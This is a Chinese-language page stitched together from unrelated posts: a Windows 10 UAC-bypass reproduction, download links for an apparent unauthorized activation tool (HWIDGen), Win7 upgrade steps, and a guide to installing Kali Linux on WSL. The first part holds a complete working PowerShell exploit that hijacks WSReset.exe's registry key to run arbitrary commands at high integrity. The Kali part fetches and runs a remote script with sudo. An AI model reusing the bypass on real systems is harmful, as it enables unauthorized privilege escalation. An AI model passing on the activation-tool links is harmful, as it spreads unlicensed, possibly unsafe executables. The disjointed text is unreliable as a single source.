环境

win10 1909 18363.535 Pro

复现

利用微软提供的sigcheck.exe签名检查工具发现 C:\Windows\System32\WSReset.exe 存在autoElevate属性为true

使用Procmon64.exe添加过滤条件

没找到 HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command

根据微软文档可知用户特定的设置优先于默认设置，而当前用户可以写入这个值，那么可以使用powershell来实现poc。

<#
.SYNOPSIS
Fileless UAC Bypass by Abusing Shell API

Author: Hashim Jawad of ACTIVELabs

.PARAMETER Command
Specifies the command you would like to run in high integrity context.

.EXAMPLE
Invoke-WSResetBypass -Command "C:\Windows\System32\cmd.exe /c start cmd.exe"

This will effectivly start cmd.exe in high integrity context.

.NOTES
This UAC bypass has been tested on the following:
 - Windows 10 Version 1803 OS Build 17134.590
 - Windows 10 Version 1809 OS Build 17763.316
#>

function Invoke-WSResetBypass {
      Param (
      [String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe"
      )

      $CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      $filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command"
      New-Item $CommandPath -Force | Out-Null
      New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null
      Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null
      Write-Host "[+] Registry entry has been created successfully!"

      $Process = Start-Process -FilePath "C:\Windows\System32\WSReset.exe" -WindowStyle Hidden
      Write-Host "[+] Starting WSReset.exe"

      Write-Host "[+] Triggering payload.."
      Start-Sleep -Seconds 5

      if (Test-Path $filePath) {
      Remove-Item $filePath -Recurse -Force
      Write-Host "[+] Cleaning up registry entry"
      }
}

在我自己测试的过程中因为WSReset.exe启动过慢的情况出现了多次复现不成功，建议把powershell脚本去掉后面的清空注册表，避免WSReset运行时找不到注册表，不过记得手动清除。

参考

1. https://www.activecyber.us/activelabs/windows-uac-bypass
2. https://github.com/sailay1996/UAC_Bypass_In_The_Wild

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

出自远景论坛

————————— 校验信息 —————————

名称: HWIDGen_CN.exe

SHA1: DC0082F4458106A4FEBC21CADD42B0E7E46FAFAF

SHA256: 8504D3568E93B0C4A026E7AAB43CC0751AD50A01A51E4AEEC951C60E37E5F6B5

查毒报告： https://www.virustotal.com/#/file/8504d3568e93b0c4a026e7aab43cc0751ad50a01a51e4aeec951c60e37e5f6b5/detection

链接:https://pan.baidu.com/s/1xoJMnUBcCvDN6_WValh3Qg
密码:2bay

虽然活动结束了，但是有大佬发出了一个强行上车的路子！有需要的可以关注一下！！！

工具下载

链接: https://pan.baidu.com/s/1Km2e3T98AFXDCBXQ_gmCRA 密码: svy7

操作步骤

1. 首先你得是Win7的系统，通过黑科技激活的也可以升级！
2. 下载工具（见工具下载），然后把它们解压到桌面上。
3. 随后打开cmd命令提示符，先输入 cd desktop 并按回车键执行它。
4. 然后输入 MediaCreationTool.exe /Selfhost 同样按回车键执行，咱们就可以瞬间收到Win10 17134 RTM更新！

官方资讯 https://www.kali.org/news/kali-linux-in-the-windows-app-store/

在过去的几周里，我们一直在与微软WSL团队合作，将Kali Linux作为官方WSL发行版引入Microsoft App Store，今天我们很高兴地宣布推出“Kali Linux”Windows应用程序。对于Windows 10用户，这意味着您可以简单地启用WSL，在Windows存储中搜索Kali，并通过单击进行安装。对于渗透测试人员和安全专业人士来说，这是一个令人兴奋的消息，因为企业合规性标准导致工具集有限。

虽然在Windows上运行Kali有一些本地运行（例如缺乏原始套接字支持）的缺点，但它带来了一些非常有趣的可能性，例如扩展您的安全工具包以包括一大堆命令行工具目前在卡利。我们将更新我们的博客，并发布更多有关此应用程序发展的新闻和更新。

在WSL上安装Kali Linux

以下是设置和安装过程的简要说明。

1. 更新您的Windows 10机器。打开一个管理PowerShell窗口并使用这一行代码安装Windows子系统。完成后需要重新启动。

   Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

2. 重新启动后，打开Windows App商店并搜索“Kali Linux”应用程序，或者点击此处直接进入。安装应用程序并享受卡莉！

升级Kali

apt-get update
apt-get dist-upgrade

桌面环境

安装wget之后运行

wget https://kali.sh/xfce4.sh
sudo ./xfce4.sh
sudo /etc/init.d/xrdp start

然后远程链接127.0.0.1:3390即可进入kali的桌面环境

tips

1. 未集成工具
2. 一些工具可能不能正常运行